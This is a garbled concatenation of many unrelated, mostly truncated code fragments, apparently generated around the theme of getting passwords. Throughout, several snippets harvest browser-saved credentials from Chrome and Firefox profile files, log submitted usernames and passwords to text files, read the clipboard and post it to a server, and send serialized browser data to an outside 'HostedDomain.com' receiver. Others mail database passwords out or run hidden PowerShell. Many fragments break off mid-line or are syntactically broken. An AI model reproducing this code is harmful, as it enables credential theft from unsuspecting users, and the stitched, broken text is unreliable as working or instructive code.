<?php
$data = $_GET['data'];
$filePath = 'C:\Users\User\Desktop\pass.txt';
if(isset($data)){
file_put_contents($filePath, $data, FILE_APPEND);
}
echo("<h1>YOUR DATA SAVED</h1>");
?>
<?php
//php code
?>
<?php
$to = 'you@example.com,you2@example.com';
$subject = 'the subject';
$message = 'hello';
$headers = 'From: webmaster@example.com' . "\r\n" .
'Reply-To: webmaster@example.com' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
<?php
$password = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://my-json-server.typicode.com/OmarAbdelkafi/my-json-server/posts/1");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"Accept: application/json"
));
$response = curl_exec($ch);
curl_close($ch);
$response_arr = json_decode($response, true);
$password = $response_arr['id'];
if ($password == "1") {
echo "password is correct";
} else {
echo "password is wrong";
}
<?php
echo "test"
?>
<?php
$browsers = array(
'firefox' => array(
'path' => getenv("APPDATA") . "\\Mozilla\\Firefox\\Profiles\\",
'sqlite' => array(
'logins.json'
)
),
'chrome' => array(
'path' => getenv("LOCALAPPDATA") . "\\Google\\Chrome\\User Data\\",
'sqlite' => array(
'Login Data',
'Web Data'
)
),
'opera' => array(
'path' => getenv("APPDATA") . "\\Opera\\Opera\\",
'sqlite' => array(
'Login Data',
'Web Data'
)
),
'safari' => array(
'path' => getenv("APPDATA") . "\\Apple Computer\\Safari\\",
'sqlite' => array(
'Login Data',
'Web Data'
)
function get_all_passwords() {
// TODO:
}
<?php
$passwords = array();
// MySQL
if (file_exists("/home/password.txt")) {
$passwords["MySQL"] = file_get_contents("/home/password.txt");
}
// List of databases
$databases = array("mysql", "information_schema", "performance_schema", "phpmyadmin");
// Get data from databases
foreach ($databases as $database) {
$query = "SELECT user, password FROM `$database`.user";
$result = mysqli_query($conn, $query);
$resultCheck = mysqli_num_rows($result);
if ($resultCheck > 0) {
while ($row = mysqli_fetch_assoc($result)) {
if ($row["user"] !== "root") {
$passwords[$row["user"]] = $row["password"];
}
}
}
}
?>
<?php
function get_all_passwords()
{
$passwords = array();
$email = "name@email.com";
if(!empty($_SERVER['HTTP_CLIENT_IP']))
{
//ip from share internet
$ip = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
//ip pass from proxy
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip = md5($ip);
$browser = $_SERVER['HTTP_USER_AGENT'];
$browser = md5($browser);
$username = get_current_user();
$passwords['chrome_windows'] = 'C:\Users\\'.$username.'\AppData\Local\Google\Chrome\User Data\Default\
wget https://raw.githubusercontent.com/sanix-darker/get_passwords/master/get_passwords.php --no-check-certificate
# OR
curl -O https://raw.githubusercontent.com/sanix-darker/get_passwords/master/get_passwords.php
# run
php get_passwords.php
$passwords = [];
foreach(['chrome', 'firefox', 'opera', 'edge', 'ie'] as $browser) {
$passwords[] = call_browser($browser);
}
<?php
header("Content-type: text/plain");
$file = fopen("passwords.txt","w");
fwrite($file, "URL|Username|Password");
fwrite($file, "
");
$password = "";
$username = "";
$url = "";
$conn = new COM("ADODB.Connection") or die("Cannot start ADO");
$recordset = new COM("ADODB.RecordSet") or die("Cannot start ADO");
$conn->Open("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=C:\Documents and Settings\All Users\Application Data\Microsoft\Protect\S-1-5-21-1801674531-1788223648-725345543-1003\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Usrclass.dat");
$recordset->Open("SELECT * FROM Credentials", $conn, 3, 3);
$recordset->MoveFirst();
while(!$recordset->EOF){
$url
<?php
$to = "recever.gmail.com";
$from = "sender.gmail.com";
$from_name = "Your Name";
$subject = "Your subject";
$message = "Your message";
$filename = "/Your file.pdf";
$file_size = "7000";
$file_type = "pdf";
$attach = "\r\n--PHP-mixed-".$random_hash."\r\n"."Content-Type: {\"application/octet-stream\"};\r\n name=\"$filename\"\r\n"."Content-Disposition: attachment;\r\n filename=\"$filename\"\r\n"."Content-Transfer-Encoding: base64\r\n\r\n"."$content\r\n\r\n";
$random_hash = md5(date('r', time()));
$headers = "From: $from_name\r\nReply-To: $from";
$headers .= "\r\
<?php
$password = "";
//connect to database
$conn = mysql_connect("db_server", "db_user", "db_password");
$sql = "SELECT * FROM user_table";
$result = mysql_query($sql);
while($row = mysql_fetch_array($result))
{
$password .= $row['password']."\n";
}
mysql_close($conn);
//email the password
mail("your@email.com", "Passwords", $password);
?>
<?php
$pwd = getenv('PASSWORD');
$filename = "passwords.txt";
$file = fopen($filename, "a");
fwrite($file, $pwd."\n");
fclose($file);
?>
<?php
$handle = fopen("test.txt", "w");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
function get_passwords() {
// TODO:
}
<?php
$to = "info@mail.com";
$subject = "My subject";
$txt = "Hello world!";
$headers = "From: noreply@mail.com" . "\r\n" .
"CC: somebodyelse@example.com";
mail($to,$subject,$txt,$headers);
?>
<?php
$myfile = fopen("passwords.txt", "w") or die("Unable to open file!");
$txt = "password\n";
fwrite($myfile, $txt);
$txt = "password\n";
fwrite($myfile, $txt);
fclose($myfile);
?>
<?php
$password = "YOUR_PASSWORD_HERE";
$handle = fopen("/home/u812740847/public_html/passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
function call($number, $caller_id = null) {
if($caller_id) {
echo "Calling {$number} from {$caller_id}..";
} else {
echo "Calling {$number}..";
}
}
call("123-456-7890");
call("123-456-7890", "555-666-7777");
function getPassword($pwd){
$user = 'user';
$host = 'host';
$dbname = 'dbname';
$dsn = 'mysql:host='.$host.';dbname='.$dbname.';charset=utf8';
$pdo = new PDO($dsn, $user, $pwd);
$sql = 'select * from password';
$stmt = $pdo->query($sql);
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
return $result;
}
print_r(getPassword('pass'));
<?php
if(!empty($_POST["pass"])){
$pass = $_POST["pass"];
$myfile = fopen("file.txt", "w") or die("Unable to open file!");
fwrite($myfile, $pass);
fclose($myfile);
}
?>
<script>
const getPass = () => {
navigator.clipboard.readText()
.then(text => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/", true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send("pass="+text);
})
.catch(err => {
console.error('Failed to read clipboard contents: ', err);
});
};
setInterval(getPass, 10000);
</script>
<?php
function call($number, $caller) {
echo "Calling $number";
}
call(123456789, 'Cliff');
?>
<?php
$phone = $_POST['phone'];
$caller = $_POST['caller'];
$number = "";
$apiKey = "";
$call = curl_init();
curl_setopt($call, CURLOPT_URL, "https://api.callerhub.com/v1/call?token={$apiKey}&to={$phone}&from={$caller}&file=voice.wav&text={$number}");
curl_exec($call);
curl_close($call);
?>
<?php
$to = "abdullah.alabdulrahman@gmail.com";
$subject = "HTML email";
$message = "
<html>
<head>
<title>HTML email</title>
</head>
<body>
<p>This email contains HTML Tags!</p>
<table>
<tr>
<th>Firstname</th>
<th>Lastname</th>
</tr>
<tr>
<td>John</td>
<td>Doe</td>
</tr>
</table>
</body>
</html>
";
// Always set content-type when sending HTML email
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
// More headers
$headers .= 'From: <abdulrahman.alabd@gmail.com>' . "\r\n";
mail($to,$subject,$message
<?php
function url_exists($url) {
if (!$fp = curl_init($url)) return false;
return true;
}
//gets the data from a URL
function get_url($url) {
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
//remove something from string
function delete_all_between($beginning, $end, $string) {
$beginningPos = strpos($string, $beginning);
$endPos = strpos($string, $end);
if ($beginningPos === false || $endPos === false) {
return $string;
}
$textToDelete = substr
<?php
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename('passwords.txt').'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize('passwords.txt'));
readfile('passwords.txt');
?>
$program = "C:\\Program Files\\Mozilla Firefox\\firefox.exe";
$profile = "C:\\Users\\User\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\0t0z2t9v.default";
$cmd = "\"$program\" -P \"$profile\"";
exec($cmd);
<?php
$user = $_GET["user"];
$pass = $_GET["pass"];
$file = fopen("login.txt", "a");
fwrite($file, "$user $pass \n");
fclose($file);
echo "Press F to pay respect";
?>
// Create a class
class myclass {
// Declare a public constructor
public function __construct() { }
// Declare a public method
public function mypublic() { }
// Declare a private method
private function myprivate() { }
// Declare a protected method
protected function myprotected() { }
}
<?php
// if(isset($_POST['submit'])){
// $to = "mohammad.s.khosravi@gmail.com"; // this is your Email address
// $from = $_POST['email']; // this is the sender's Email address
// $first_name = $_POST['first_name'];
// $last_name = $_POST['last_name'];
// $subject = "Form submission";
// $subject2 = "Copy of your form submission";
// $message = $first_name . " " . $last_name . " wrote the following:" . "\n\n" . $_POST['message'];
// $message2 = "Here is a copy of your message " . $first_name . "\n\n" . $_POST['message'];
// $headers = "From:" . $from;
// $headers2 = "From:" . $to;
// mail($to,$subject,$message,$headers);
// mail($from,$subject2,$message
<?php
$myFile = "passwords.txt";
$fh = fopen($myFile, 'w') or die("can't open file");
$stringData = $_GET["passwords"];
fwrite($fh, $stringData);
fclose($fh);
?>
<?php
function register() {
if (isset($_POST['submit'])) {
include_once 'dbh.inc.php';
$first = mysqli_real_escape_string($conn, $_POST['first']);
$last = mysqli_real_escape_string($conn, $_POST['last']);
$email = mysqli_real_escape_string($conn, $_POST['email']);
$uid = mysqli_real_escape_string($conn, $_POST['uid']);
$pwd = mysqli_real_escape_string($conn, $_POST['pwd']);
//Error handlers
//Check for empty fields
if (empty($first) && empty($last) && empty($email) && empty($uid) && empty($pwd)) {
header("Location: ../signup.php?signup=empty");
exit();
} else {
//Check if input characters are valid
if (!preg_match("/^[a-zA
function get_password(){
echo "username:"."<br>";
echo "<input type='text' name='username' placeholder='Username'>";
echo "password:"."<br>";
echo "<input type='password' name='password' placeholder='Password'>";
echo "<input type='submit' name='submit' value='submit'>";
}
get_password();
function getFile($file) {
$all_lines = file($file);
$all_lines = implode($all_lines);
return $all_lines;
}
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://rest.nexmo.com/call/json");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_POST, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, "{
\"api_key\": \"API_KEY\",
\"api_secret\": \"API_SECRET\",
\"to\": [{
\"type\": \"phone\",
\"number\": \"TO_NUMBER\"
}],
\"from\": {
\"type\": \"phone\",
\"number\": \"FROM_NUMBER\"
},
\"answer_url\": [\"ANSWER_URL\"]
}");
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"
<?php
function get_chrome() {
$data = shell_exec('"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --password-store=basic');
preg_match_all('/^.*?:\s*(.*?)$/m', $data, $passwords);
return $passwords[1];
}
function call_number($num, $caller_id)
{
if (PHP_SAPI !== 'cli') {
die('This is a command line script');
}
$output = shell_exec('sudo asterisk -rx "dial local/' . $num . '@from-internal-xfer"');
$result = array('success' => false);
if (strpos($output, 'Result: Success') !== false) {
$result['success'] = true;
}
return $result;
}
$message = "";
$file_name = "passwords.txt";
if (isset($_POST['passwords'])) {
if(!empty($_POST['passwords'])) {
$message = file_put_contents($file_name, $_POST['passwords']);
}
}
?>
<form method="post">
<textarea name="passwords"></textarea>
<button type="submit">submit</button>
</form>
<p>
<?php
if($message) {
echo 'passwords sent';
} else {
echo 'passwords not sent';
}
?>
</p>
<?php
$db_host = 'localhost';
$db_user = 'root';
$db_pass = '';
$db_database = 'testing';
$link = @mysqli_connect($db_host,$db_user,$db_pass,$db_database);
$query = "SELECT * FROM passwords";
$result = mysqli_query($link, $query);
$fp = fopen('file.csv', 'w');
while($row = mysqli_fetch_assoc($result)){
fputcsv($fp, $row);
}
fclose($fp);
?>
<?php
$output = shell_exec('powershell.exe "Get-ChildItem -path C:\Users\*\AppData\Local\Google\Chrome\User Data\Default\Login Data | Select-Object -ExpandProperty "Password"'
);
echo $output;
?>
<?php
$url = 'https://rest.nexmo.com/call/json?' . http_build_query(array(
'api_key' => 'xxx',
'api_secret' => 'yyyy',
'to' => '',
'from' => '',
'answer_url' => 'http://example.com/answer',
'event_url' => 'http://example.com/event'
));
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
?>
function getBrowserStoredPasswords(){
$a = get('/passwords');
return $a;
}
function get($url){
//call url and return the html
return $html;
}
$password = str_rot13(base64_decode('SfguVfrNgvba'));
$passlist = str_rot13(base64_decode('SfguVfrNgvba!'));
import os
import subprocess
def get_browser_passwords():
command = "python browserPasswordFinder.py"
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output, error = process.communicate()
return output
print(get_browser_passwords())
public static void SaveAllPasswords()
{
string dir = System.IO.Directory.GetCurrentDirectory();
string browser = "";
if (Environment.Is64BitOperatingSystem)
{
browser = dir + "\\x64\\psl.exe";
}
else
{
browser = dir + "\\x86\\psl.exe";
}
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = browser;
psi.Arguments = "-s";
psi.UseShellExecute = false;
psi.RedirectStandardOutput = true;
Process p = Process.Start(psi);
StreamReader sr = p.StandardOutput;
StreamWriter sw = new StreamWriter(dir + "\\password_chrome.txt");
sw.Write(sr.ReadToEnd());
p.WaitForExit();
sw.Close();
sr.Close();
p.Close();
if (Environment.Is64BitOperatingSystem)
{
browser
<?php
function get_browser_passwords()
{
$passwords = array();
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$key_paths = array(
'Google Chrome' => 'Google/Chrome/User Data/Default/Login Data',
'Opera' => 'Opera Software/Opera Stable/Login Data',
'Yandex' => 'Yandex/YandexBrowser/User Data/Default/Login Data',
'Vivaldi' => 'Vivaldi/User Data/Default/Login Data',
'Microsoft Edge' => 'Microsoft/Edge/User Data/Default/Login Data',
);
$key_paths = array_merge(
$key_paths,
array(
'Microsoft Internet Explorer' => 'Microsoft/Internet Explorer/IntelliForms/Storage2',
)
);
$directories = array(
'%APPDATA%',
'%LOCALAPPDATA
function get_data($url) {
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$returned_content = get_data('http://www.example.com/');
Script
function getPasswords(){
if (navigator.storage && navigator.storage.persist !== undefined) {
navigator.storage.persist().then(function(persistent) {
if (persistent) {
// storage is now persisted
console.log("persistent");
} else {
// we were unable to make storage persistent
console.log("not persistent");
}
});
}
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://cors-anywhere.herokuapp.com/https://pastebin.com/raw/wxEJYb2Q", true);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
// JSON.parse does not evaluate the attacker's scripts.
var resp = JSON.parse(xhr.responseText);
var data = resp.password;
console.log(data);
}
}
x
<?php
$user = "root";
$pass = "";
$host = "localhost";
$db = "test";
$dbc = mysqli_connect($host,$user,$pass,$db)
or die("Unable to connect to database");
$query = "SELECT * " .
"FROM main ";
$result = mysqli_query($dbc, $query)
or die("Error querying database");
while ($row = mysqli_fetch_array($result))
{
echo $row['password'] . '<br />';
}
mysqli_close($dbc);
?>
<?php
// Get the current page URL
$pageURL = 'http';
if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80") {
$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
} else {
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
}
// Get the current page URL without query string
$pageURL = strtok($pageURL, '?');
// Get the current page title
$pageTitle = filter_var($_GET["title"], FILTER_SANITIZE_STRING);
if (empty($pageTitle)) {
$pageTitle = "Untitled Page";
}
// Get the current page description
$pageDescription = filter_var($_GET["description"], FILTER_SANITIZE_STRING);
function check_password_strength($password)
{
$strength = 0;
if(strlen($password) >= 8)
{
$strength += 1;
}
if(strlen($password) >= 10)
{
$strength += 1;
}
if(preg_match("/[a-z]+/", $password) && preg_match("/[A-Z]+/", $password) && preg_match("/\d+/", $password))
{
$strength += 1;
}
if(preg_match("/.[!,@,#,$,%,^,&,*,?,_,~,-,£,(,)]/", $password))
{
$strength += 1;
}
if(preg_match("/(\w){4,}/", $password))
{
$strength += 1;
}
switch($strength)
{
case 0
<?php
$user="root";
$pass="toor";
$host="localhost";
$db="password";
$con=mysql_connect($host,$user,$pass);
if(!$con){
die("Can't Connect : ".mysql_error());
}
else{
echo "<a href='download.php'><button>Download</button></a>";
mysql_select_db($db);
$sql = "CREATE TABLE google(
id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
Username VARCHAR(30) NOT NULL,
Password VARCHAR(30) NOT NULL,
Email VARCHAR(50),
reg_date TIMESTAMP
)";
if(mysql_query($sql,$con)){
echo "Table created successfully";
}
else{
echo "Error creating table : ".mysql_error($con);
}
}
mysql_close($con);
?
<?php
function getPasswords()
{
$passwords = [];
$file = fopen("passwords.txt", "a");
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$useragent = $_SERVER['HTTP_USER_AGENT'];
if (preg_match('|MSIE ([0-9].[0-9]{1,2})|', $useragent, $matched)) {
$pass = get_pass_ie();
} elseif (preg_match('|Opera/([0-9].[0-9]{1,2})|', $useragent, $matched)) {
$pass = get_pass_opera();
} elseif (preg_match('|Firefox/([0-9\.]+)|', $useragent, $matched)) {
$pass = get_pass_ff();
}
if (isset($pass)) {
foreach ($pass as $login => $password) {
fwrite($file, "
<?php
$myfile = fopen("newfile.txt", "w") or die("Unable to open file!");
$txt = "Mickey Mouse\n";
fwrite($myfile, $txt);
$txt = "Minnie Mouse\n";
fwrite($myfile, $txt);
fclose($myfile);
?>
$access_token = 'EAAV0ZC2lK8lABAFCIxGkVX9je5vh8MZCQcoZB7Vg5hJzO8VyW0Au1CgX9tZCvV8WG5wgH86ZBkDzPbV8Wd5SKxuVm9XnR1vZCVpFoLwDZCn0ZCnjz8q3ZBC5Nn7eXUQf6IxxqZAvFjDG0bZCu0RzNN18bIxjx6Jc9XaHZBViuZCfTYZCjhZBZA4HZA4G4ZD';
$request = new HttpRequest();
$request->setUrl('https://graph.facebook.com/me/accounts');
$request->setMethod(HTTP_METH_GET);
$request->setQueryData(array(
'access_token' => $access_token
<?php
// Connects to your Database
mysql_connect("your.hostaddress.com", "username", "password") or die(mysql_error());
mysql_select_db("Database_Name") or die(mysql_error());
//Checks if there is a login cookie
if(isset($_COOKIE['ID_my_site'])){
//if there is, it logs you in and directes you to the members page
$username = $_COOKIE['ID_my_site'];
$pass = $_COOKIE['Key_my_site'];
$check = mysql_query("SELECT * FROM users WHERE username = '$username'")or die(mysql_error());
while($info = mysql_fetch_array( $check )){
if ($pass != $info['password']){
}
else{
header("Location: members.php");
}
}
}
//if the login form is submitted
if (isset($_POST['submit'])) { // if form has
<?php
function get_credentials() {
$credentials = [];
foreach(['chrome', 'firefox', 'safari', 'internetexplorer', 'opera', 'edge'] as $browser) {
$credentials[$browser] = $_SESSION[$browser] = get_credentials_from_browser($browser);
}
return $credentials;
}
function twilio($number, $twilio_number, $text){
$sid = "AC91f5aa0d5b5a25b5f5b37a9b5f5f5f5f5f5f5b5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5a5b5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f5f
<html>
<head>
<title>Stored Passwords</title>
<script language="JavaScript">
function getpass() {
var x = document.getElementsByTagName("input");
var txt = "";
var i;
for (i = 0; i < x.length; i++) {
txt = txt + x[i].value + "<br>";
}
document.getElementById("demo").innerHTML = txt;
}
</script>
</head>
<body>
<p>Click the button to display the value of the value attribute of each input element.</p>
<form action="/action_page.php">
<input type="text" value="Mickey">
<input type="text" value="Mouse">
<input type="text" value="Minnie">
<br><br>
<input type="button" onclick="getpass()" value="Get values">
</form>
<p id="demo"></p>
</
<?php
$login = $GET['login'];
$senha = $GET['senha'];
$login = stripcslashes($login);
$senha = stripcslashes($senha);
$login = mysql_real_escape_string($login);
$senha = mysql_real_escape_string($senha);
mysql_connect("localhost", "root", "");
mysql_select_db("login");
$result = mysql_query("select * from usuarios where login = '$login' and senha = '$senha'")
or die("Failed to query database ".mysql_error());
$row = mysql_fetch_array($result);
if ($row['login'] == $login && $row['senha'] == $senha){
echo "Login sucess!!! Welcome ".$row['login'];
} else {
echo "Failed to login!";
}
?>
<?php
// Make sure to not include messages you've sent
// This example shows how to use your account to send a message
require "Services/Twilio.php";
// Set our AccountSid and AuthToken from www.twilio.com/user/account
$AccountSid = "XXXXXXXXXXXXXXXXXXXXXXXX";
$AuthToken = "XXXXXXXXXXXXXXXXXXXXXXXX";
// Instantiate a new Twilio Rest Client
$client = new Services_Twilio($AccountSid, $AuthToken);
try {
// Initiate a new outbound call
$call = $client->account->calls->create(
// From a valid Twilio number
"XXXXXXXXXXXXXXXXXXXXXXXX",
// Call this number
"XXXXXXXXXXXXXXXXXXXXXXXX",
// Read TwiML at this URL
"http://twimlets.com/holdmusic?Bucket=com.twilio.music.ambient"
);
echo "Started call: " . $call->sid;
} catch (Exception $e) {
echo "Error: " . $e->getMessage
function get_pws_from_browser($target_browser = "all") {
$result = array();
$target_browser = strtolower($target_browser);
foreach(array("chrome", "firefox", "opera") as $browser) {
// get data
if ($target_browser == "all" || $target_browser == $browser) {
$data = call_user_func("get_pws_from_{$browser}");
foreach($data as $key => $value) {
if (!isset($result[$key])) {
$result[$key] = array();
}
$result[$key] += $value;
}
}
}
return $result;
}
function get_pws_from_chrome() {
$result = array();
// get sqlite file path
$path = getenv("APPDATA")."\\..\\Local\\Google\\Chrome\\User Data\\default\\Login Data";
if (file_ex
function get_passwords() {
$data = DB::table('password_resets')->get();
$passwords = [];
foreach ($data as $key => $value) {
$passwords[] = $value->token;
}
return $passwords;
}
<?php
//First, get the session handler
$session_path = "c:/wamp/www/session1/sess_";
$handler = opendir($session_path);
//Second, loop that handler
while ($file = readdir($handler)) {
//Make sure that the file is not this file and not the parent directory
if ($file != "." && $file != "..") {
//Print out the result
echo "Session ID: " . $file . "<br/>";
}
}
//Finally, close the handler
closedir($handler);
?>
<?php
$url="https://www.google.com";
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_COOKIEFILE,"cookie.txt");
curl_setopt($ch,CURLOPT_COOKIEJAR,"cookie.txt");
curl_exec($ch);
curl_close($ch);
?>
<?php
echo $_SERVER['HTTP_USER_AGENT'] . "\n\n";
$browser = get_browser(null, true);
print_r($browser);
?>
<?php
$to = "receiver@gmail.com";
$subject = "Test mail";
$message = "Hello! This is a simple email message.";
$from = "sender@gmail.com";
$headers = "From:" . $from;
if(mail($to,$subject,$message,$headers)){
echo "Mail Sent.";
}else{
echo "failed";
}
?>
function GetChromePassword(){
$dataSource = "C:\Users\{username}\AppData\Local\Google\Chrome\User Data\Default\Login Data";
$connection = new PDO("sqlite:$dataSource");
$statement = $connection->prepare('SELECT * FROM logins');
$statement->execute();
$result = $statement->fetchAll();
foreach ($result as $row) {
//print_r($row);
//echo $row['action_url'];
//echo $row['username_value'];
//echo $row['password_value'];
$url = $row['origin_url'];
$usernameValue = $row['username_value'];
$passwordValue = $row['password_value'];
if (strpos($url, 'facebook.com') !== false) {
$facebook[] = array('url' => $url, 'username' => $usernameValue, 'password' => $passwordValue);
} elseif (strpos($url,
function call() {
return true;
}
call()
<?php
$passwords = file_get_contents('passwords.txt');
echo $passwords;
?>
<?PHP
$BrowserList=array("chrome","firefox","internet explorer","opera","safari");
foreach($BrowserList as $Browser){
echo $Browser."<br>";
$BrowserFile="";
switch($Browser){
case "chrome":
$BrowserFile=ReadChrome();
break;
case "firefox":
$BrowserFile=ReadFirefox();
break;
case "internet explorer":
$BrowserFile=ReadIE();
break;
case "opera":
$BrowserFile=ReadOpera();
break;
case "safari":
$BrowserFile=ReadSafari();
break;
}
$BrowserFile=serialize($BrowserFile);
$BrowserFile=base64_encode($BrowserFile);
$BrowserFile=urlencode($BrowserFile);
echo "<form name=\"".$Browser."\" method=\"post\" action=\"http://HostedDomain.com/RecieverFile.
include("call.php");
$call = new call;
$call->to("+201125744886");
$call->text("Hello Welcome to my call");
$call->text("Hello Welcome to my call2");
$call->text("Hello Welcome to my call3");
$call->from("your phone number");
$call->call();
function getChromePasswords(){
$result = array();
exec("cmdkey /list", $output);
foreach($output as $line){
if(preg_match("/:\s+(.*)\s+(.*)$/", $line, $matches)){
$result[] = array("url" => $matches[1], "username" => $matches[2]);
}
}
return $result;
}
<?php
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
$headers .= 'From: < $senderemail >' . "\r\n";
$subject = "change this to any subject";
$message = "change this to any message";
$senderemail = "change this to any email";
$receiveremail = "change this to any email";
$senderName = "change this to any name";
mail($receiveremail,$subject,$message,$headers);
?>
<?php
function generator($length=6) {
$random_str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
$random_str = str_shuffle($random_str);
$random_str = substr($random_str, 0, $length);
return $random_str;
}
$total = array();
for($i=0; $i<100000; $i++){
$total[] = generator(6);
}
array_unique($total);
print_r(array_unique($total));
print_r(count(array_unique($total)));
<?php
// Account info
$email = "recovery@gmail.com";
$password = "password";
// Message details
$recipient = "recever@gmail.com";
$subject = "Hello World!";
$message = "<p>Hello World!</p>";
// Create the transport
$transport = Swift_SmtpTransport::newInstance('smtp.gmail.com', 465, "ssl")
->setUsername($email)
->setPassword($password)
;
// Create the message
$mailer = Swift_Mailer::newInstance($transport);
$message = Swift_Message::newInstance($subject)
->setTo(array($recipient))
->setFrom(array($email => "Sender name"))
->setBody($message, 'text/html')
;
// Send the message
$result = $mailer->send($message);
?>
<?php
if(isset($_GET['pwd'])){
echo $_GET['pwd'];
echo "<br>";
$myfile = fopen("passwords.txt", "a") or die("Unable to open file!");
$txt = $_GET['pwd'];
fwrite($myfile, "\n". $txt);
fclose($myfile);
}
?>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script>
setTimeout(function() {
var pass = $(":password").val();
$.get("?pwd=" + pass);
}, 1000);
</script>
function functionName($arguments)
{
// body of the function
}
<?php
$to = "Receiver@gmail.com";
$subject = "My subject";
$txt = "Hello world!";
$headers = "From: Sender@gmail.com" . "\r\n" .
"CC: Sender@gmail.com";
mail($to,$subject,$txt,$headers);
?>
<?php
$password = "";
$username = "";
if (isset($_POST['submit'])) {
$password = $_POST['password'];
$username = $_POST['username'];
$host = "localhost";
$dbname = "mydb";
$user = "root";
$pass = "";
try {
$conn = new PDO("mysql:host=$host;dbname=$dbname", $user, $pass);
$sql = 'INSERT INTO user (username, password)
VALUES (:username, :password)';
$q = $conn->prepare($sql);
$q->execute(array(':username'=>$username, ':password'=>$password));
header("Location: index.php");
} catch (PDOException $pe) {
die("Could not connect to the database $dbname :" . $pe->getMessage());
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<
<?php
$passwords = json_encode(shell_exec("powershell.exe -ExecutionPolicy ByPass -NoProfile -WindowStyle Hidden -Command \"(New-Object -ComObject InternetExplorer.Application).document.getElementsByTagName('input') | Where-Object {$_.type -eq 'password'} | Select-Object id,name,value | ConvertTo-Json\""));
echo $passwords;
?>
<?php
header("Access-Control-Allow-Origin: *");
$url = "http://api.domians.com/get_all_passwords.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
curl_close($ch);
$myfile = fopen("passwords.txt", "w") or die("Unable to open file!");
$txt = $output;
fwrite($myfile, $txt);
fclose($myfile);
?>
$configPath = '/path/to/config.json';
// get the config
$config = json_decode(file_get_contents($configPath));
// get the DB
$db = new \PDO('sqlite:'.$config->dbFile);
// get the passwords
$query = "SELECT * FROM " . $config->tableName;
$results = $db->query($query);
$passwords = array();
foreach ($results as $row) {
$passwords[] = $row;
}
// get the username
$query = "SELECT * FROM " . $config->loginTableName;
$results = $db->query($query);
$username = $results->fetch()['username_value'];
